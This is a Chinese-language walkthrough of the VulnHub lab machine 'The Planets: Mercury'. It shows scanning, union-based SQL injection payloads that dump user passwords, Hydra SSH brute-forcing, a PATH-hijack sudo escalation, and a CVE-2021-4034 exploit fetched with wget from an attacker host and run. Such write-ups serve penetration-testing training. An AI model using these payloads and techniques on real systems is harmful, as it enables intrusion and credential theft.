THE PLANETS MERCURY

靶机精讲之THE PLANETS MERCURY，一台vulnhub靶机，标准攻击链明快利落，让你学的每一点渗透知识都非常有价值，用到的都是大路知识，并不冷门。算是一台攻击链样板机了。

THE PLANETS MERCURY 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.115    
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-15 07:58 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27:D5:99:58 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds

端口扫描的结果显示，TCP 端口中开启了 22 和 8080 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -sC -p22,8080 192.168.56.115        
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-15 07:59 EDT
Nmap scan report for 192.168.56.115
Host is up (0.00040s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Thu, 15 Jun 2023 00:59:20 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Thu, 15 Jun 2023 00:59:20 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn\'t have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=6/15%Time=648AFD15%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2015\x20Jun\x202
SF:023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.2
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x2
SF:0DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\
SF:nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x
SF:20currently\x20in\x20development\x20please\x20check\x20back\x20later\."
SF:)%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2015\x20J
SF:un\x202023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/
SF:3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\
SF:x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20l
SF:ater\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\
SF:.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<titl
SF:e>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<
SF:body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/
SF:1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x2
SF:0or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n"
SF:)%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x2
SF:0Thu,\x2015\x20Jun\x202023\x2000:59:20\x20GMT\r\nServer:\x20WSGIServer/
SF:0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Option
SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
SF:20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x2020
SF:px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x2
SF:0\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee;
SF:\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1p
SF:x\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:normal
SF:;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20font
SF:-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20
SF:table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:10
SF:0%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:D5:99:58 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.90 seconds

Web 渗透

8080 端口下有个 robots.txt，点进去并没有发现有价值的信息。还探测到了 WSGIServer/0.2 CPython/3.8.2 搜了一下似乎某个采用这两个组件的系统存在漏洞。

尝试其中的路径，得到了错误返回，看来并不是这个系统，但是错误返回里包含了我们所想寻找的信息

由于开发者开启了 DEBUG 模式，因此服务器返回了敏感信息，我们从中得到了我们需要的目录信息

目录中有两个子链，分别指向 todo 和 1

SQL 注入

todo 中给定了一些开发者在开发过程中留下的计划，我们可以得知两个事情：一是目前没有鉴权，二是目前是直接和 mysql 进行交互的。我们看看另一个链接，其中包含数字，可能存在 SQL 注入

尝试单引号

单引号报错，返回信息中确认了是 MySQL 数据库，似乎是数字型注入，不需要闭合，接下来尝试 union 联合注入，首先使用 order by

接下来使用联合查询

http://192.168.56.115:8080/mercuryfacts/-1 union select database()

确认了数据库名，接下来查看数据库下的表名

http://192.168.56.115:8080/mercuryfacts/1 union select group_concat(table_name) from information_schema.tables where table_schema = 'mercury'

表中的列名

http://192.168.56.115:8080/mercuryfacts/1 union select group_concat(column_name) from information_schema.columns where table_name = 'users'

然后直接查询数据库即可

http://192.168.56.115:8080/mercuryfacts/2 union select group_concat(id,0x2d,password,0x2d,username) from users

hydra爆破

收集用户名和密码，按行写入到文件中，在使用 awk 工具来将用户名和密码存入对应的文件

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db                                
1-johnny1987-john
2-lovemykids111-laura
3-lovemybeer111-sam
4-mercuryisthesizeof0.056Earths-webmaster

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db | awk -F '-' '{print$2}' > passwd    

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ cat db | awk -F '-' '{print$3}' > user

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ hydra -L user -P passwd 192.168.56.115 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-15 08:36:33
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task
[DATA] attacking ssh://192.168.56.115:22/
[22][ssh] host: 192.168.56.115   login: webmaster   password: mercuryisthesizeof0.056Earths
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-15 08:36:38

爆破得到用户名和密码，尝试 ssh 登录

┌──(kali㉿kali)-[~/Downloads/THE_PLANETS_MERCURY]
└─$ ssh webmaster@192.168.56.115    
webmaster@192.168.56.115\'s password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 15 Jun 01:37:12 UTC 2023

  System load:  0.01              Processes:               106
  Usage of /:   78.3% of 4.86GB   Users logged in:         0
  Memory usage: 31%               IPv4 address for enp0s3: 192.168.56.115
  Swap usage:   0%


22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Sep  1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:d5:99:58 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.115/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 497sec preferred_lft 497sec
    inet6 fe80::a00:27ff:fed5:9958/64 scope link 
       valid_lft forever preferred_lft forever
webmaster@mercury:~$ uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
webmaster@mercury:~$ sudo -l
[sudo] password for webmaster: 
Sorry, user webmaster may not run sudo on mercury.
webmaster@mercury:~$ ls
mercury_proj  user_flag.txt
webmaster@mercury:~$ cat user_flag.txt 
[user_flag_8339915c9a454657bd60ee58776f4ccd]

提权

信息收集

webmaster@mercury:~$ ls -liah
total 36K
 35299 drwx------ 4 webmaster webmaster 4.0K Sep  2  2020 .
    18 drwxr-xr-x 5 root      root      4.0K Aug 28  2020 ..
 32650 lrwxrwxrwx 1 webmaster webmaster    9 Sep  1  2020 .bash_history -> /dev/null
 35301 -rw-r--r-- 1 webmaster webmaster  220 Aug 27  2020 .bash_logout
 35300 -rw-r--r-- 1 webmaster webmaster 3.7K Aug 27  2020 .bashrc
165881 drwx------ 2 webmaster webmaster 4.0K Aug 27  2020 .cache
162261 drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28  2020 mercury_proj
 35302 -rw-r--r-- 1 webmaster webmaster  807 Aug 27  2020 .profile
    22 -rw-rw-r-- 1 webmaster webmaster   75 Sep  1  2020 .selected_editor
 55367 -rw------- 1 webmaster webmaster   45 Sep  1  2020 user_flag.txt
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -liah
total 28K
162261 drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28  2020 .
 35299 drwx------ 4 webmaster webmaster 4.0K Sep  2  2020 ..
165898 -rw-r--r-- 1 webmaster webmaster    0 Aug 27  2020 db.sqlite3
165900 -rwxr-xr-x 1 webmaster webmaster  668 Aug 27  2020 manage.py
165882 drwxrwxr-x 6 webmaster webmaster 4.0K Sep  1  2020 mercury_facts
165766 drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28  2020 mercury_index
165765 drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28  2020 mercury_proj
166251 -rw------- 1 webmaster webmaster  196 Aug 28  2020 notes.txt

进入到 mercury_proj 目录下看到有个 notes.txt

webmaster@mercury:~/mercury_proj$ cat manage.py 
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys

def main():
    """Run administrative tasks."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mercury_proj.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)

if __name__ == '__main__':
    main()
webmaster@mercury:~/mercury_proj$ cat notes.txt 
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==

横向移动

txt 文件中包含两个用户名和对应的密码（应该是密码），base64 解码

webmaster@mercury:~/mercury_proj$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mercury:x:1000:1000:mercury:/home/mercury:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
webmaster:x:1001:1001:,,,:/home/webmaster:/bin/bash
linuxmaster:x:1002:1002:,,,:/home/linuxmaster:/bin/bash

┌──(kali㉿kali)-[~]
└─$ echo -e "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km

┌──(kali㉿kali)-[~]
└─$ echo -e "bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK" | base64 -d
mercuryisthesizeof0.056Earths

顺便看一眼 passwd 文件，确认 linux_master 是个用户，切换用户

webmaster@mercury:~/mercury_proj$ su linuxmaster
Password: 
linuxmaster@mercury:/home/webmaster/mercury_proj$ cd ~
linuxmaster@mercury:~$ ls
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Sep  2  2020 .
    18 drwxr-xr-x 5 root        root        4.0K Aug 28  2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster    9 Sep  1  2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster  220 Aug 28  2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28  2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28  2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster  807 Aug 28  2020 .profile

环境变量与 sudoer 利用

sudo -l 发现用户有个可以用 root 直接运行的 sh 脚本，而脚本中调用了 tail 命令，这里刚开始没想到提权的方式，用 polkit 进行了提权，在红队笔记的视频中补充了这种提权方式

linuxmaster@mercury:/home$ sudo -l
[sudo] password for linuxmaster: 
Matching Defaults entries for linuxmaster on mercury:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User linuxmaster may run the following commands on mercury:
    (root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:/home$ ls -liah /usr/bin/check_syslog.sh
166272 -rwxr-xr-x 1 root root 39 Aug 28  2020 /usr/bin/check_syslog.sh
linuxmaster@mercury:/home$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:/home$ /usr/bin/check_syslog.sh
tail: cannot open '/var/log/syslog' for reading: Permission denied
linuxmaster@mercury:/home$ sudo /usr/bin/check_syslog.sh
Jun 15 01:37:12 mercury systemd[4101]: Reached target Sockets.
Jun 15 01:37:12 mercury systemd[4101]: Reached target Basic System.
Jun 15 01:37:12 mercury systemd[1]: Started User Manager for UID 1001.
Jun 15 01:37:12 mercury systemd[1]: Started Session 13 of user webmaster.
Jun 15 01:37:12 mercury systemd[4101]: Reached target Main User Target.
Jun 15 01:37:12 mercury systemd[4101]: Startup finished in 73ms.
Jun 15 01:40:32 mercury systemd-networkd[343]: enp0s3: DHCP: No gateway received from DHCP server.
Jun 15 01:40:32 mercury systemd-timesyncd[469]: Network configuration changed, trying to establish connection.
Jun 15 01:45:31 mercury systemd-networkd[343]: enp0s3: DHCP: No gateway received from DHCP server.
Jun 15 01:45:31 mercury systemd-timesyncd[469]: Network configuration changed, trying to establish connection.
linuxmaster@mercury:/home$ id
uid=1002(linuxmaster) gid=1002(linuxmaster) groups=1002(linuxmaster),1003(viewsyslog)

既然调用了 tail 命令，我们可以利用环境变量和软链接，将 tail 指向 vi，然后按照 sudo -l 中的要求给定环境变量，去执行 sh 脚本，最后利用 vi 中 :!bash 新开启一个交互 shell 即可实现提权

linuxmaster@mercury:~$ ln -s /bin/vi tail
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Jun 15 07:39 .
    18 drwxr-xr-x 5 root        root        4.0K Aug 28  2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster    9 Sep  1  2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster  220 Aug 28  2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28  2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28  2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster  807 Aug 28  2020 .profile
162271 lrwxrwxrwx 1 linuxmaster linuxmaster    7 Jun 15 07:39 tail -> /bin/vi
linuxmaster@mercury:~$ export PATH=.:$PATH
linuxmaster@mercury:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh 
[sudo] password for linuxmaster: 
2 files to edit

root@mercury:/home/linuxmaster#

linuxmaster@mercury:/home$ find / -type f -perm -04000 -ls 2>/dev/null
     1098    164 -rwsr-xr-x   1 root     root       166056 Feb  3  2020 /usr/bin/sudo
      694     88 -rwsr-xr-x   1 root     root        88464 May 28  2020 /usr/bin/gpasswd
     1097     68 -rwsr-xr-x   1 root     root        67816 Apr  2  2020 /usr/bin/su
      571     52 -rwsr-xr-x   1 root     root        53040 May 28  2020 /usr/bin/chsh
      842     44 -rwsr-xr-x   1 root     root        44784 May 28  2020 /usr/bin/newgrp
      828     56 -rwsr-xr-x   1 root     root        55528 Apr  2  2020 /usr/bin/mount
      565     84 -rwsr-xr-x   1 root     root        85064 May 28  2020 /usr/bin/chfn
      497     56 -rwsr-sr-x   1 daemon   daemon      55560 Nov 12  2018 /usr/bin/at
      896     32 -rwsr-xr-x   1 root     root        31032 Aug 16  2019 /usr/bin/pkexec
     1167     40 -rwsr-xr-x   1 root     root        39144 Apr  2  2020 /usr/bin/umount
      676     40 -rwsr-xr-x   1 root     root        39144 Mar  7  2020 /usr/bin/fusermount
      875     68 -rwsr-xr-x   1 root     root        68208 May 28  2020 /usr/bin/passwd
     1381     16 -rwsr-xr-x   1 root     root        14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
     1374     52 -rwsr-xr--   1 root     messagebus    51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
     1586    464 -rwsr-xr-x   1 root     root         473576 May 29  2020 /usr/lib/openssh/ssh-keysign
     1596     24 -rwsr-xr-x   1 root     root          22840 Aug 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1

Linux Polkit 权限提升漏洞CVE-2021-4034

看到 policykit-agent-helper-1 和 pkexec，可以尝试 CVE-2021-4034

linuxmaster@mercury:/tmp$ wget http://192.168.56.106:8088/exploit
--2023-06-15 02:11:03--  http://192.168.56.106:8088/exploit
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4442423 (4.2M) [application/octet-stream]
Saving to: ‘exploit’

exploit                      100%[==============================================>]   4.24M  --.-KB/s    in 0.04s   

2023-06-15 02:11:03 (118 MB/s) - ‘exploit’ saved [4442423/4442423]

linuxmaster@mercury:/tmp$ ls
exploit
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-logind.service-wwncgi
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-resolved.service-4UEN1e
systemd-private-45c1fa3565004439b6a6c8b9e9d5799b-systemd-timesyncd.service-yQdfjg
linuxmaster@mercury:/tmp$ chmod +x exploit 
linuxmaster@mercury:/tmp$ ./exploit 
2023/06/15 02:11:17 CMDTOEXECUTE is empty fallback to default value
2023/06/15 02:11:17 Executing command sh
# id
uid=0(root) gid=0(root) groups=0(root),1002(linuxmaster),1003(viewsyslog)
# whoami
root
# cd /root
# ls
root_flag.txt
# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]

到这里，提权结束

linuxmaster@mercury:/usr/share$ find / -type f -writable -not -path "/sys*" -not -path "/proc*" 2>/dev/null
/home/linuxmaster/.bashrc
/home/linuxmaster/.bash_logout
/home/linuxmaster/.profile
/home/linuxmaster/.cache/motd.legal-displayed

polkit-agent-helper-1 提权

尝试上次红队笔记用的 helper 提权，但是授权用户是 mercury，因此无法直接提权

linuxmaster@mercury:/usr/share$ systemd-run -t bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.                                                
Authenticating as: mercury
Password: 
polkit-agent-helper-1: pam_authenticate failed: Authentication failure
==== AUTHENTICATION FAILED ===
Failed to start transient service unit: Access denied